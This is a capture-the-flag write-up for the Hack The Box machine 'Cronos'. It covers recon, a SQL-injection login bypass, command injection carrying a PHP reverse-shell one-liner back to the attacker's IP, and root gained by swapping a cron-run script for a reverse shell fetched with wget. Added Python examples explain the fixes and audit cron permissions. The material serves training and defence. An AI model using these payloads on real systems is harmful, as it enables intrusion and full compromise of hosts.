Introduction
I am a Hack The Box beginner. If you have any corrections, additions or advice, please leave a comment or contact me on Twitter. さんぽし (@sanpo_shiho) | Twitter
cheat sheet
I keep a cheat sheet of tool usage and similar notes at the link below; feel free to refer to it. github | sanposhiho/MYCHEATSHEET
About the machine
The difficulty is medium.
nmap
kali@kali:~$ nmap -sC -sV 10.10.10.13
Starting Nmap 7.80 ( https://nmap.org ) at 2020-07-02 05:26 EDT
Nmap scan report for 10.10.10.13
Host is up (0.25s latency).
Not shown: 997 filtered ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.1 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 18:b9:73:82:6f:26:c7:78:8f:1b:39:88:d8:02:ce:e8 (RSA)
| 256 1a:e6:06:a6:05:0b:bb:41:92:b0:28:bf:7f:e5:96:3b (ECDSA)
|_ 256 1a:0e:e7:ba:00:cc:02:01:04:cd:a3:a9:3f:5e:22:20 (ED25519)
53/tcp open domain ISC BIND 9.10.3-P4 (Ubuntu Linux)
| dns-nsid:
|_ bind.version: 9.10.3-P4-Ubuntu
80/tcp open http Apache httpd 2.4.18 ((Ubuntu))
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Apache2 Ubuntu Default Page: It works
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 31.43 seconds
Port 80
The Apache default page comes up.
Adding cronos.htb to /etc/hosts and accessing it shows the following page.
gobuster
kali@kali:~$ gobuster dir -u http://cronos.htb/ -w /usr/share/dirb/wordlists/big.txt -k -t 40 -x php,txt
===============================================================
Gobuster v3.0.1
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@_FireFart_)
===============================================================
[+] Url: http://cronos.htb/
[+] Threads: 40
[+] Wordlist: /usr/share/dirb/wordlists/big.txt
[+] Status codes: 200,204,301,302,307,401,403
[+] User Agent: gobuster/3.0.1
[+] Extensions: php,txt
[+] Timeout: 10s
===============================================================
2020/07/03 04:39:42 Starting gobuster
===============================================================
/.htpasswd (Status: 403)
/.htpasswd.php (Status: 403)
/.htpasswd.txt (Status: 403)
/.htaccess (Status: 403)
/.htaccess.php (Status: 403)
/.htaccess.txt (Status: 403)
/css (Status: 301)
/favicon.ico (Status: 200)
/index.php (Status: 200)
/js (Status: 301)
/robots.txt (Status: 200)
/robots.txt (Status: 200)
/server-status (Status: 403)
===============================================================
2020/07/03 04:47:27 Finished
===============================================================
subdomain enumeration
kali@kali:~$ host -l cronos.htb 10.10.10.13
Using domain server:
Name: 10.10.10.13
Address: 10.10.10.13#53
Aliases:
cronos.htb name server ns1.cronos.htb.
cronos.htb has address 10.10.10.13
admin.cronos.htb has address 10.10.10.13
ns1.cronos.htb has address 10.10.10.13
www.cronos.htb has address 10.10.10.13
Only admin.cronos.htb serves a different page.
gobuster (admin)
kali@kali:~$ gobuster dir -u http://admin.cronos.htb/ -w /usr/share/dirb/wordlists/big.txt -k -t 40 -x php,txt
===============================================================
Gobuster v3.0.1
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@_FireFart_)
===============================================================
[+] Url: http://admin.cronos.htb/
[+] Threads: 40
[+] Wordlist: /usr/share/dirb/wordlists/big.txt
[+] Status codes: 200,204,301,302,307,401,403
[+] User Agent: gobuster/3.0.1
[+] Extensions: php,txt
[+] Timeout: 10s
===============================================================
2020/07/03 13:22:35 Starting gobuster
===============================================================
/.htpasswd (Status: 403)
/.htpasswd.php (Status: 403)
/.htpasswd.txt (Status: 403)
/.htaccess (Status: 403)
/.htaccess.txt (Status: 403)
/.htaccess.php (Status: 403)
/config.php (Status: 200)
/index.php (Status: 200)
/logout.php (Status: 302)
/server-status (Status: 403)
/session.php (Status: 302)
/welcome.php (Status: 302)
===============================================================
2020/07/03 13:29:56 Finished
===============================================================
Trying to log in by brute force with hydra
kali@kali:~$ hydra -L /usr/share/wfuzz/wordlist/Injections/SQL.txt -p pass admin.cronos.htb http-post-form "/index.php:username=^USER^&password=^PASS^:Your Login Name or Password is invalid" -f
Hydra v9.0 (c) 2019 by van Hauser/THC - Please do not use in military or secret service organizations, or for illegal purposes.
Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2020-07-03 13:52:56
[DATA] max 16 tasks per 1 server, overall 16 tasks, 125 login tries (l:125/p:1), ~8 tries per task
[DATA] attacking http-post-form://admin.cronos.htb:80/index.php:username=^USER^&password=^PASS^:Your Login Name or Password is invalid
[80][http-post-form] host: admin.cronos.htb login: ' or 0=0 # password: pass
[STATUS] attack finished for admin.cronos.htb (valid pair found)
1 of 1 target successfully completed, 1 valid password found
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2020-07-03 13:52:59
It looks like SQL injection will work.
Login succeeded.
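To make the failure behind this login bypass concrete, here is an added example (my own, not the author's and not the Cronos application's code) that rebuilds the login query two ways against a constructed in-memory SQLite table. The payload hydra found ends in MySQL's "#" comment marker; SQLite's equivalent is "--", so that is what the example uses. The table name, columns and the credentials are assumptions.

```python
import sqlite3

def make_db():
    """Constructed in-memory stand-in for the admin panel's user table."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (username TEXT, password TEXT)")
    conn.execute("INSERT INTO users VALUES ('admin', 'correct-horse')")
    return conn

# The payload on the page is  ' or 0=0 #  ('#' starts a comment in MySQL).
# SQLite comments start with '--', so this is the equivalent payload here.
BYPASS = "' or 0=0 -- "

def login_vulnerable(conn, username, password):
    """Builds the WHERE clause by string concatenation: the quote in the
    username closes the literal, 'or 0=0' makes the predicate true for
    every row, and the comment marker discards the password check."""
    query = ("SELECT username FROM users WHERE username = '" + username +
             "' AND password = '" + password + "'")
    row = conn.execute(query).fetchone()
    return row is not None

def login_parameterized(conn, username, password):
    """Same query with bound parameters: the driver sends the values
    separately from the SQL text, so input can never change its structure."""
    row = conn.execute(
        "SELECT username FROM users WHERE username = ? AND password = ?",
        (username, password),
    ).fetchone()
    return row is not None

if __name__ == "__main__":
    db = make_db()
    print("vulnerable, bypass payload:", login_vulnerable(db, BYPASS, "pass"))
    print("parameterized, bypass payload:", login_parameterized(db, BYPASS, "pass"))
    print("parameterized, real credentials:",
          login_parameterized(db, "admin", "correct-horse"))
```

The parameterized version returns False for the bypass payload and True only for the real credentials. Storing the password in clear text is itself a defect kept here only to keep the query comparison short; a real login compares a password hash.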
RCE
It obviously smells like RCE will work, so I enter the following and hit Execute!
10.10.14.48;php -r '$sock=fsockopen("10.10.14.48",4242);exec("/bin/sh -i <&3 >&3 2>&3");'
kali@kali:~$ nc -lnvp 4242
listening on [any] 4242 ...
connect to [10.10.14.48] from (UNKNOWN) [10.10.10.13] 45382
/bin/sh: 0: can't access tty; job control turned off
$
As expected, we get a shell.
PE (privilege escalation)
Looking at the crontab:
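The reason a ping form ends up running "php -r" is a command-injection bug: the submitted target is pasted into a shell command line, so ";" ends the ping and starts a second command. The following added example (not from the page or the machine) shows a vulnerable handler beside a hardened one. It uses "echo" as a stand-in for "ping -c 1" so it runs anywhere without network access; BASE_CMD, run_vulnerable, validate_target and run_hardened are my own names.

```python
import ipaddress
import subprocess

# Stand-in for "ping -c 1" so the example runs anywhere (constructed);
# the real form handler would put the ping command here.
BASE_CMD = ["echo", "pinging"]

def run_vulnerable(target):
    """Form handler that pastes the submitted target into a shell command
    line. The shell interprets ';', '|', '$(...)' and so on, so the target
    becomes part of the program rather than just its data."""
    cmdline = " ".join(BASE_CMD) + " " + target
    result = subprocess.run(cmdline, shell=True, capture_output=True, text=True)
    return result.stdout

def validate_target(target):
    """Allowlist: accept only a string that parses as an IPv4/IPv6 address.
    Anything containing ';', spaces or option dashes fails here, before any
    command runs."""
    try:
        return str(ipaddress.ip_address(target.strip()))
    except ValueError:
        raise ValueError(f"rejected target: {target!r}") from None

def run_hardened(target):
    """Validate first, then hand the OS an argv list with shell=False so
    exactly one program runs and the target is only ever an argument."""
    ip = validate_target(target)
    result = subprocess.run(BASE_CMD + [ip], shell=False,
                            capture_output=True, text=True)
    return result.stdout

if __name__ == "__main__":
    print(run_vulnerable("10.10.14.48; echo INJECTED"), end="")
    print(run_hardened("10.10.14.48"), end="")
    try:
        run_hardened("10.10.14.48; echo INJECTED")
    except ValueError as exc:
        print(exc)
```

Both halves of the fix matter: the allowlist rejects anything that is not an address, and passing argv without a shell means that even a value that slipped through validation would reach the program as a single argument, not as shell syntax. Filtering individual metacharacters on its own is not a substitute.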
$ cat /etc/crontab
cat /etc/crontab
# /etc/crontab: system-wide crontab
# Unlike any other crontab you don't have to run the `crontab'
# command to install the new version when you edit this file
# and files in /etc/cron.d. These files also have username fields,
# that none of the other crontabs do.
SHELL=/bin/sh
PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin
# m h dom mon dow user command
17 * * * * root cd / && run-parts --report /etc/cron.hourly
25 6 * * * root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.daily )
47 6 * * 7 root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.weekly )
52 6 1 * * root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.monthly )
* * * * * root php /var/www/laravel/artisan schedule:run >> /dev/null 2>&1
#
/var/www/laravel/artisan is run on a schedule, so I replace /var/www/laravel/artisan with php-reverse-shell.php.
$ cd /var/www/laravel
cd /var/www/laravel
$ wget http://10.10.14.48:8000/php-reverse-shell.php
wget http://10.10.14.48:8000/php-reverse-shell.php
--2020-07-03 21:22:58-- http://10.10.14.48:8000/php-reverse-shell.php
Connecting to 10.10.14.48:8000... connected.
HTTP request sent, awaiting response... 200 OK
Length: 5493 (5.4K) [application/octet-stream]
Saving to: 'php-reverse-shell.php'
php-reverse-shell.p 100%[===================>] 5.36K --.-KB/s in 0s
2020-07-03 21:22:58 (598 MB/s) - 'php-reverse-shell.php' saved [5493/5493]
$ mv php-reverse-shell.php artisan
mv php-reverse-shell.php artisan
The file is fetched with wget from my host.
Waiting in this state for the crontab to run...
kali@kali:~$ nc -lnvp 1212
listening on [any] 1212 ...
connect to [10.10.14.48] from (UNKNOWN) [10.10.10.13] 55106
Linux cronos 4.4.0-72-generic #93-Ubuntu SMP Fri Mar 31 14:07:41 UTC 2017 x86_64 x86_64 x86_64 GNU/Linux
21:24:02 up 10:02, 0 users, load average: 0.00, 0.00, 0.00
USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT
uid=0(root) gid=0(root) groups=0(root)
/bin/sh: 0: can't access tty; job control turned off
# whoami
root
Got root.
Closing
For a medium machine it was quite easy.
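What made this escalation possible is a root cron job whose script, and the directory holding it, belong to the web user, so the file can simply be moved aside. The added Python below (my own, not the author's) is a small audit that parses a system crontab and flags root jobs whose script or parent directory is owned by a non-root user or is group/world-writable. The crontab text is the one shown above; the ownership table is constructed, with uid 33 standing for www-data as it does on Debian/Ubuntu (the page only shows that the web user could replace artisan); lookup_live is included so the same audit can be run against a real /etc/crontab.

```python
import os
import re
import stat

# System crontab copied from the page, used as sample input.
SAMPLE_CRONTAB = """\
SHELL=/bin/sh
PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin
# m h dom mon dow user command
17 * * * * root cd / && run-parts --report /etc/cron.hourly
25 6 * * * root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.daily )
* * * * * root php /var/www/laravel/artisan schedule:run >> /dev/null 2>&1
"""

# Constructed ownership table {path: (uid, permission bits)} standing in
# for os.stat on the target. uid 33 is www-data on Debian/Ubuntu (assumed).
SAMPLE_OWNERSHIP = {
    "/etc/cron.hourly": (0, 0o755),
    "/usr/sbin/anacron": (0, 0o755),
    "/etc/cron.daily": (0, 0o755),
    "/var/www/laravel": (33, 0o755),
    "/var/www/laravel/artisan": (33, 0o644),
}

# Five time fields, then the user, then the command (system crontab format).
JOB_RE = re.compile(r"^(?:\S+\s+){5}(?P<user>\S+)\s+(?P<cmd>.+)$")
REDIRECT_RE = re.compile(r"\d?>{1,2}&?\s*\S+")

def parse_jobs(text):
    """Return (user, command) pairs, skipping comments and VAR=value lines."""
    jobs = []
    for line in text.splitlines():
        line = line.strip()
        if not line or line.startswith("#") or "=" in line.split()[0]:
            continue
        m = JOB_RE.match(line)
        if m:
            jobs.append((m.group("user"), m.group("cmd")))
    return jobs

def script_paths(cmd):
    """Absolute paths the command touches, with shell redirections removed
    so /dev/null is not reported."""
    cmd = REDIRECT_RE.sub(" ", cmd)
    return [tok for tok in cmd.split() if tok.startswith("/") and tok != "/"]

def weakness(uid, mode):
    """Describe why a non-root user could change this object, or None."""
    if uid != 0:
        return f"owned by uid {uid}, not root"
    if mode & (stat.S_IWGRP | stat.S_IWOTH):
        return f"group/world-writable (mode {oct(mode)})"
    return None

def audit(text, lookup):
    """Flag root jobs whose script, or the directory holding it, a non-root
    user could modify. lookup(path) -> (uid, mode), or None if unknown.
    Returns (what, path, reason) tuples."""
    findings = []
    for user, cmd in parse_jobs(text):
        if user != "root":
            continue
        for path in script_paths(cmd):
            for what, candidate in (("script", path),
                                    ("parent directory", os.path.dirname(path))):
                info = lookup(candidate)
                if info is None:
                    continue
                reason = weakness(*info)
                if reason:
                    findings.append((what, candidate, reason))
    return findings

def lookup_live(path):
    """Real-filesystem lookup for running the audit on an actual /etc/crontab."""
    try:
        st = os.stat(path)
    except OSError:
        return None
    return st.st_uid, stat.S_IMODE(st.st_mode)

if __name__ == "__main__":
    for what, path, reason in audit(SAMPLE_CRONTAB, SAMPLE_OWNERSHIP.get):
        print(f"root cron job {what} {path}: {reason}")
```

On the sample data it reports both the artisan script and /var/www/laravel, which is the directory-ownership case the mv above relies on: the script itself being root-owned is not enough if a lower-privileged user owns the directory around it. Run with lookup_live on a host of your own to check the real cron entries; files under /etc/cron.d should be fed through the same function.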